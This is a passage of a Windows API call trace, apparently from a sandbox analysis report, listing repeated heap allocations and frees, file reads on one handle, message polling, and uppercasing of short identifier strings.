(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0209.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50eb020 [0209.041] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.041] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0xef91, lpOverlapped=0x0) returned 1 [0209.043] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xef91) returned 0x2aae878 [0209.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50eb020 | out: hHeap=0x2af0000) returned 1 [0209.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xef91) returned 0x2abd818 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xef91) returned 0x2aae878 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0209.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0209.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.050] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0209.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xef91) returned 0x2aae878 [0209.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0209.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xef91) returned 0x2acc7b8 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.053] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0209.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0209.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0209.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0209.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0209.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 